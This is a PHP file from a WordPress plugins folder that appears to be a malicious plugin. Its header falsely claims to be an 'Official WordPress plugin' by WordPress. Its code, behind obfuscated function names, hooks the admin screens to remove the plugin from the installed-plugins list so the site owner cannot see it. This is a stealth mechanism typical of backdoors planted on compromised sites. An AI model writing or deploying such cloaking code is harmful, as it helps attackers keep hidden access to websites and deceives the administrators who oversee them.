File: /home/creaqbdc/www/wp-content/plugins/wp-automated-physical/wp-automated-physical.php
<?php
/*
Plugin Name: WP Automated Physical
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 8.1.9
Author URI: http://wordpress.org/#
License: GPL2
*/
function tlv_wxn()
{
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }
    $d = array('wp-automated-physical/wp-automated-physical.php');
    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $d)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}
function dkz_jdd($plugins)
{
    $k = 'wp-automated-physical/wp-automated-physical.php';
    if (array_key_exists($k, $plugins)) {
        unset($plugins[$k]);
    }
    return $plugins;
}
if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'tlv_wxn');
    add_filter('all_plugins', 'dkz_jdd');
}